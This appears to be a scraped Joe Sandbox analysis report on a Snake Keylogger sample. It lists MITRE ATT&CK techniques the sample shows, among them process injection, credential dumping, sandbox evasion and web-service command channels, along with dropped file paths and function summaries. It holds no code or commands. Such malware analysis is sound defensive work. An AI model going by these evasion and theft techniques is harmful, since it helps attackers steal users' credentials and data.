Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 87h216Snb7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4aocm4cm.ztm.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fy4nunoa.0lz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g02d5kz1.isf.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iahkyl0s.ms1.ps1

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exe

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\Teet173.net

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\bibliotekskaldene.meg

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\nedlaeggelse.eva

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\tretrinsraket.rik

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\udplacder.keg

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Fugtighedsanlggene.Spo

Windows Analysis Report
87h216Snb7.exe

Function 0040351C Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464
stringfilecomCOMMON

Function 00405705 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405C4D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00406C5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 00403FC1 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403C13 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 004030A2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Function 0040657E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204
stringCOMMON

Function 00401794 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre